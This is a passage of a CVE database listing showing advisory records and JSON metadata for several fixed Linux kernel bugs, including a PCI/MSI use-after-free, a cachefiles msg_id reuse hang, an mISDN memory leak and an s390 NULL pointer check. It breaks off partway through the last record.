pci_alloc_irq_vectors+0x18/0x28 Descriptor allocation done in: __pci_enable_msi_range msi_capability_init msi_setup_msi_desc msi_insert_msi_desc msi_domain_insert_msi_desc msi_alloc_desc ... Freed in case of failure in __msi_domain_alloc_locked() __pci_enable_msi_range msi_capability_init pci_msi_setup_msi_irqs msi_domain_alloc_irqs_all_locked msi_domain_alloc_locked __msi_domain_alloc_locked => fails msi_domain_free_locked ... That failure propagates back to pci_msi_setup_msi_irqs() in msi_capability_init() which accesses the descriptor for unmasking in the error exit path. Cure it by copying the descriptor and using the copy for the error exit path unmask operation. [ tglx: Massaged change log ]

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/0ae40b2d0a5de6b04…
	https://git.kernel.org/stable/c/ff1121d2214b794dc…
	https://git.kernel.org/stable/c/45fc8d20e0768ab0a…
	https://git.kernel.org/stable/c/9eee5330656bf92f5…

Impacted products

Vendor

Product

Version

Linux

Affected: bf6e054e0e3fbc9614355b760e18c8a14f952a4e , < 0ae40b2d0a5de6b045504098e365d4fdff5bbeba (git)
Affected: bf6e054e0e3fbc9614355b760e18c8a14f952a4e , < ff1121d2214b794dc1772081f27bdd90721a84bc (git)
Affected: bf6e054e0e3fbc9614355b760e18c8a14f952a4e , < 45fc8d20e0768ab0a0ad054081d0f68aa3c83976 (git)
Affected: bf6e054e0e3fbc9614355b760e18c8a14f952a4e , < 9eee5330656bf92f51cb1f09b2dc9f8cf975b3d1 (git)

Linux

Affected: 5.17
Unaffected: 0 , < 5.17 (semver)
Unaffected: 6.1.109 , ≤ 6.1.* (semver)
Unaffected: 6.6.37 , ≤ 6.6.* (semver)
Unaffected: 6.9.8 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:00:53.719Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ff1121d2214b794dc1772081f27bdd90721a84bc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/45fc8d20e0768ab0a0ad054081d0f68aa3c83976"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9eee5330656bf92f51cb1f09b2dc9f8cf975b3d1"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41096",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:20:22.209715Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:09.074Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/pci/msi/msi.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "0ae40b2d0a5de6b045504098e365d4fdff5bbeba",
              "status": "affected",
              "version": "bf6e054e0e3fbc9614355b760e18c8a14f952a4e",
              "versionType": "git"
            },
            {
              "lessThan": "ff1121d2214b794dc1772081f27bdd90721a84bc",
              "status": "affected",
              "version": "bf6e054e0e3fbc9614355b760e18c8a14f952a4e",
              "versionType": "git"
            },
            {
              "lessThan": "45fc8d20e0768ab0a0ad054081d0f68aa3c83976",
              "status": "affected",
              "version": "bf6e054e0e3fbc9614355b760e18c8a14f952a4e",
              "versionType": "git"
            },
            {
              "lessThan": "9eee5330656bf92f51cb1f09b2dc9f8cf975b3d1",
              "status": "affected",
              "version": "bf6e054e0e3fbc9614355b760e18c8a14f952a4e",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/pci/msi/msi.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.17"
            },
            {
              "lessThan": "5.17",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.109",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.37",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.109",
                  "versionStartIncluding": "5.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.37",
                  "versionStartIncluding": "5.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.8",
                  "versionStartIncluding": "5.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.17",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI/MSI: Fix UAF in msi_capability_init\n\nKFENCE reports the following UAF:\n\n BUG: KFENCE: use-after-free read in __pci_enable_msi_range+0x2c0/0x488\n\n Use-after-free read at 0x0000000024629571 (in kfence-#12):\n  __pci_enable_msi_range+0x2c0/0x488\n  pci_alloc_irq_vectors_affinity+0xec/0x14c\n  pci_alloc_irq_vectors+0x18/0x28\n\n kfence-#12: 0x0000000008614900-0x00000000e06c228d, size=104, cache=kmalloc-128\n\n allocated by task 81 on cpu 7 at 10.808142s:\n  __kmem_cache_alloc_node+0x1f0/0x2bc\n  kmalloc_trace+0x44/0x138\n  msi_alloc_desc+0x3c/0x9c\n  msi_domain_insert_msi_desc+0x30/0x78\n  msi_setup_msi_desc+0x13c/0x184\n  __pci_enable_msi_range+0x258/0x488\n  pci_alloc_irq_vectors_affinity+0xec/0x14c\n  pci_alloc_irq_vectors+0x18/0x28\n\n freed by task 81 on cpu 7 at 10.811436s:\n  msi_domain_free_descs+0xd4/0x10c\n  msi_domain_free_locked.part.0+0xc0/0x1d8\n  msi_domain_alloc_irqs_all_locked+0xb4/0xbc\n  pci_msi_setup_msi_irqs+0x30/0x4c\n  __pci_enable_msi_range+0x2a8/0x488\n  pci_alloc_irq_vectors_affinity+0xec/0x14c\n  pci_alloc_irq_vectors+0x18/0x28\n\nDescriptor allocation done in:\n__pci_enable_msi_range\n    msi_capability_init\n        msi_setup_msi_desc\n            msi_insert_msi_desc\n                msi_domain_insert_msi_desc\n                    msi_alloc_desc\n                        ...\n\nFreed in case of failure in __msi_domain_alloc_locked()\n__pci_enable_msi_range\n    msi_capability_init\n        pci_msi_setup_msi_irqs\n            msi_domain_alloc_irqs_all_locked\n                msi_domain_alloc_locked\n                    __msi_domain_alloc_locked =\u003e fails\n                    msi_domain_free_locked\n                        ...\n\nThat failure propagates back to pci_msi_setup_msi_irqs() in\nmsi_capability_init() which accesses the descriptor for unmasking in the\nerror exit path.\n\nCure it by copying the descriptor and using the copy for the error exit path\nunmask operation.\n\n[ tglx: Massaged change log ]"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:22:00.374Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/0ae40b2d0a5de6b045504098e365d4fdff5bbeba"
        },
        {
          "url": "https://git.kernel.org/stable/c/ff1121d2214b794dc1772081f27bdd90721a84bc"
        },
        {
          "url": "https://git.kernel.org/stable/c/45fc8d20e0768ab0a0ad054081d0f68aa3c83976"
        },
        {
          "url": "https://git.kernel.org/stable/c/9eee5330656bf92f51cb1f09b2dc9f8cf975b3d1"
        }
      ],
      "title": "PCI/MSI: Fix UAF in msi_capability_init",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41096",
    "datePublished": "2024-07-29T15:48:09.247Z",
    "dateReserved": "2024-07-12T12:17:45.637Z",
    "dateUpdated": "2025-11-03T22:00:53.719Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-41050 (GCVE-0-2024-41050)

Vulnerability from cvelistv5 – Published: 2024-07-29 14:32 – Updated: 2025-11-03 21:59

Title

cachefiles: cyclic allocation of msg_id to avoid reuse

Summary

In the Linux kernel, the following vulnerability has been resolved: cachefiles: cyclic allocation of msg_id to avoid reuse Reusing the msg_id after a maliciously completed reopen request may cause a read request to remain unprocessed and result in a hung, as shown below: t1 | t2 | t3 ------------------------------------------------- cachefiles_ondemand_select_req cachefiles_ondemand_object_is_close(A) cachefiles_ondemand_set_object_reopening(A) queue_work(fscache_object_wq, &info->work) ondemand_object_worker cachefiles_ondemand_init_object(A) cachefiles_ondemand_send_req(OPEN) // get msg_id 6 wait_for_completion(&req_A->done) cachefiles_ondemand_daemon_read // read msg_id 6 req_A cachefiles_ondemand_get_fd copy_to_user // Malicious completion msg_id 6 copen 6,-1 cachefiles_ondemand_copen complete(&req_A->done) // will not set the object to close // because ondemand_id && fd is valid. // ondemand_object_worker() is done // but the object is still reopening. // new open req_B cachefiles_ondemand_init_object(B) cachefiles_ondemand_send_req(OPEN) // reuse msg_id 6 process_open_req copen 6,A.size // The expected failed copen was executed successfully Expect copen to fail, and when it does, it closes fd, which sets the object to close, and then close triggers reopen again. However, due to msg_id reuse resulting in a successful copen, the anonymous fd is not closed until the daemon exits. Therefore read requests waiting for reopen to complete may trigger hung task. To avoid this issue, allocate the msg_id cyclically to avoid reusing the msg_id for a very short duration of time.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/35710c6c4a1c64478…
	https://git.kernel.org/stable/c/de045a82e1a4e04be…
	https://git.kernel.org/stable/c/9d3bf4e9aa23f0d9e…
	https://git.kernel.org/stable/c/19f4f399091478c95…

Impacted products

Vendor

Product

Version

Linux

Affected: c8383054506c77b814489c09877b5db83fd4abf2 , < 35710c6c4a1c64478ec1b5e0e81d386c0844dec6 (git)
Affected: c8383054506c77b814489c09877b5db83fd4abf2 , < de045a82e1a4e04be62718d3c2981a55150765a0 (git)
Affected: c8383054506c77b814489c09877b5db83fd4abf2 , < 9d3bf4e9aa23f0d9e99ebe7a94f232ddba54ee17 (git)
Affected: c8383054506c77b814489c09877b5db83fd4abf2 , < 19f4f399091478c95947f6bd7ad61622300c30d9 (git)

Linux

Affected: 5.19
Unaffected: 0 , < 5.19 (semver)
Unaffected: 6.1.100 , ≤ 6.1.* (semver)
Unaffected: 6.6.41 , ≤ 6.6.* (semver)
Unaffected: 6.9.10 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:59:51.369Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/35710c6c4a1c64478ec1b5e0e81d386c0844dec6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/de045a82e1a4e04be62718d3c2981a55150765a0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9d3bf4e9aa23f0d9e99ebe7a94f232ddba54ee17"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/19f4f399091478c95947f6bd7ad61622300c30d9"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41050",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:22:44.765096Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:32:57.925Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/cachefiles/internal.h",
            "fs/cachefiles/ondemand.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "35710c6c4a1c64478ec1b5e0e81d386c0844dec6",
              "status": "affected",
              "version": "c8383054506c77b814489c09877b5db83fd4abf2",
              "versionType": "git"
            },
            {
              "lessThan": "de045a82e1a4e04be62718d3c2981a55150765a0",
              "status": "affected",
              "version": "c8383054506c77b814489c09877b5db83fd4abf2",
              "versionType": "git"
            },
            {
              "lessThan": "9d3bf4e9aa23f0d9e99ebe7a94f232ddba54ee17",
              "status": "affected",
              "version": "c8383054506c77b814489c09877b5db83fd4abf2",
              "versionType": "git"
            },
            {
              "lessThan": "19f4f399091478c95947f6bd7ad61622300c30d9",
              "status": "affected",
              "version": "c8383054506c77b814489c09877b5db83fd4abf2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/cachefiles/internal.h",
            "fs/cachefiles/ondemand.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.19"
            },
            {
              "lessThan": "5.19",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.100",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.41",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.100",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.41",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.10",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncachefiles: cyclic allocation of msg_id to avoid reuse\n\nReusing the msg_id after a maliciously completed reopen request may cause\na read request to remain unprocessed and result in a hung, as shown below:\n\n       t1       |      t2       |      t3\n-------------------------------------------------\ncachefiles_ondemand_select_req\n cachefiles_ondemand_object_is_close(A)\n cachefiles_ondemand_set_object_reopening(A)\n queue_work(fscache_object_wq, \u0026info-\u003ework)\n                ondemand_object_worker\n                 cachefiles_ondemand_init_object(A)\n                  cachefiles_ondemand_send_req(OPEN)\n                    // get msg_id 6\n                    wait_for_completion(\u0026req_A-\u003edone)\ncachefiles_ondemand_daemon_read\n // read msg_id 6 req_A\n cachefiles_ondemand_get_fd\n copy_to_user\n                                // Malicious completion msg_id 6\n                                copen 6,-1\n                                cachefiles_ondemand_copen\n                                 complete(\u0026req_A-\u003edone)\n                                 // will not set the object to close\n                                 // because ondemand_id \u0026\u0026 fd is valid.\n\n                // ondemand_object_worker() is done\n                // but the object is still reopening.\n\n                                // new open req_B\n                                cachefiles_ondemand_init_object(B)\n                                 cachefiles_ondemand_send_req(OPEN)\n                                 // reuse msg_id 6\nprocess_open_req\n copen 6,A.size\n // The expected failed copen was executed successfully\n\nExpect copen to fail, and when it does, it closes fd, which sets the\nobject to close, and then close triggers reopen again. However, due to\nmsg_id reuse resulting in a successful copen, the anonymous fd is not\nclosed until the daemon exits. Therefore read requests waiting for reopen\nto complete may trigger hung task.\n\nTo avoid this issue, allocate the msg_id cyclically to avoid reusing the\nmsg_id for a very short duration of time."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:20:57.512Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/35710c6c4a1c64478ec1b5e0e81d386c0844dec6"
        },
        {
          "url": "https://git.kernel.org/stable/c/de045a82e1a4e04be62718d3c2981a55150765a0"
        },
        {
          "url": "https://git.kernel.org/stable/c/9d3bf4e9aa23f0d9e99ebe7a94f232ddba54ee17"
        },
        {
          "url": "https://git.kernel.org/stable/c/19f4f399091478c95947f6bd7ad61622300c30d9"
        }
      ],
      "title": "cachefiles: cyclic allocation of msg_id to avoid reuse",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41050",
    "datePublished": "2024-07-29T14:32:06.761Z",
    "dateReserved": "2024-07-12T12:17:45.626Z",
    "dateUpdated": "2025-11-03T21:59:51.369Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2022-48863 (GCVE-0-2022-48863)

Vulnerability from cvelistv5 – Published: 2024-07-16 12:25 – Updated: 2025-05-04 08:24

Title

mISDN: Fix memory leak in dsp_pipeline_build()

Summary

In the Linux kernel, the following vulnerability has been resolved: mISDN: Fix memory leak in dsp_pipeline_build() dsp_pipeline_build() allocates dup pointer by kstrdup(cfg), but then it updates dup variable by strsep(&dup, "|"). As a result when it calls kfree(dup), the dup variable contains NULL. Found by Linux Driver Verification project (linuxtesting.org) with SVACE.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/a3d5fcc6cf2ecbba5…
	https://git.kernel.org/stable/c/7777b1f795af1bb43…
	https://git.kernel.org/stable/c/640445d6fc059d451…
	https://git.kernel.org/stable/c/c6a502c2299941c83…

Impacted products

Vendor

Product

Version

Linux

Affected: 960366cf8dbb3359afaca30cf7fdbf69a6d6dda7 , < a3d5fcc6cf2ecbba5a269631092570aa285a24cb (git)
Affected: 960366cf8dbb3359afaca30cf7fdbf69a6d6dda7 , < 7777b1f795af1bb43867375d8a776080111aae1b (git)
Affected: 960366cf8dbb3359afaca30cf7fdbf69a6d6dda7 , < 640445d6fc059d4514ffea79eb4196299e0e2d0f (git)
Affected: 960366cf8dbb3359afaca30cf7fdbf69a6d6dda7 , < c6a502c2299941c8326d029cfc8a3bc8a4607ad5 (git)

Linux

Affected: 2.6.27
Unaffected: 0 , < 2.6.27 (semver)
Unaffected: 5.10.106 , ≤ 5.10.* (semver)
Unaffected: 5.15.29 , ≤ 5.15.* (semver)
Unaffected: 5.16.15 , ≤ 5.16.* (semver)
Unaffected: 5.17 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T15:25:01.685Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a3d5fcc6cf2ecbba5a269631092570aa285a24cb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7777b1f795af1bb43867375d8a776080111aae1b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/640445d6fc059d4514ffea79eb4196299e0e2d0f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c6a502c2299941c8326d029cfc8a3bc8a4607ad5"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-48863",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:25:25.668277Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:07.200Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/isdn/mISDN/dsp_pipeline.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "a3d5fcc6cf2ecbba5a269631092570aa285a24cb",
              "status": "affected",
              "version": "960366cf8dbb3359afaca30cf7fdbf69a6d6dda7",
              "versionType": "git"
            },
            {
              "lessThan": "7777b1f795af1bb43867375d8a776080111aae1b",
              "status": "affected",
              "version": "960366cf8dbb3359afaca30cf7fdbf69a6d6dda7",
              "versionType": "git"
            },
            {
              "lessThan": "640445d6fc059d4514ffea79eb4196299e0e2d0f",
              "status": "affected",
              "version": "960366cf8dbb3359afaca30cf7fdbf69a6d6dda7",
              "versionType": "git"
            },
            {
              "lessThan": "c6a502c2299941c8326d029cfc8a3bc8a4607ad5",
              "status": "affected",
              "version": "960366cf8dbb3359afaca30cf7fdbf69a6d6dda7",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/isdn/mISDN/dsp_pipeline.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.27"
            },
            {
              "lessThan": "2.6.27",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.106",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.29",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.16.*",
              "status": "unaffected",
              "version": "5.16.15",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "5.17",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.106",
                  "versionStartIncluding": "2.6.27",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.29",
                  "versionStartIncluding": "2.6.27",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.16.15",
                  "versionStartIncluding": "2.6.27",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.17",
                  "versionStartIncluding": "2.6.27",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmISDN: Fix memory leak in dsp_pipeline_build()\n\ndsp_pipeline_build() allocates dup pointer by kstrdup(cfg),\nbut then it updates dup variable by strsep(\u0026dup, \"|\").\nAs a result when it calls kfree(dup), the dup variable contains NULL.\n\nFound by Linux Driver Verification project (linuxtesting.org) with SVACE."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:24:57.485Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/a3d5fcc6cf2ecbba5a269631092570aa285a24cb"
        },
        {
          "url": "https://git.kernel.org/stable/c/7777b1f795af1bb43867375d8a776080111aae1b"
        },
        {
          "url": "https://git.kernel.org/stable/c/640445d6fc059d4514ffea79eb4196299e0e2d0f"
        },
        {
          "url": "https://git.kernel.org/stable/c/c6a502c2299941c8326d029cfc8a3bc8a4607ad5"
        }
      ],
      "title": "mISDN: Fix memory leak in dsp_pipeline_build()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2022-48863",
    "datePublished": "2024-07-16T12:25:26.482Z",
    "dateReserved": "2024-07-16T11:38:08.920Z",
    "dateUpdated": "2025-05-04T08:24:57.485Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42235 (GCVE-0-2024-42235)

Vulnerability from cvelistv5 – Published: 2024-08-07 15:14 – Updated: 2025-05-04 09:24

Title

s390/mm: Add NULL pointer check to crst_table_free() base_crst_free()

Summary

In the Linux kernel, the following vulnerability has been resolved: s390/mm: Add NULL pointer check to crst_table_free() base_crst_free() crst_table_free() used to work with NULL pointers before the conversion to ptdescs. Since crst_table_free() can be called with a NULL pointer (error handling in crst_table_upgrade() add an explicit check. Also add the same check to base_crst_free() for consistency reasons. In real life this should not happen, since order two GFP_KERNEL allocations will not fail, unless FAIL_PAGE_ALLOC is enabled and used.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/794fa52b94637d6b2…
	https://git.kernel.org/stable/c/f80bd8bb6f380bc26…
	https://git.kernel.org/stable/c/b5efb63acf7bddaf2…

Impacted products

Vendor

Product

Version

Linux

Affected: 6326c26c1514757242829b292b26eac589013200 , < 794fa52b94637d6b2e8c9474fbe3983af5c9f046 (git)
Affected: 6326c26c1514757242829b292b26eac589013200 , < f80bd8bb6f380bc265834c46058d38b34174813e (git)
Affected: 6326c26c1514757242829b292b26eac589013200 , < b5efb63acf7bddaf20eacfcac654c25c446eabe8 (git)

Linux

Affected: 6.6
Unaffected: 0 , < 6.6 (semver)
Unaffected: 6.6.41 , ≤ 6.6.* (semver)
Unaffected: 6.9.10 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42235",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:14:07.518719Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:32.266Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "arch/s390/mm/pgalloc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "794fa52b94637d6b2e8c9474fbe3983af5c9f046",
              "status": "affected",
              "version": "6326c26c1514757242829b292b26eac589013200",
              "versionType": "git"
            },
            {
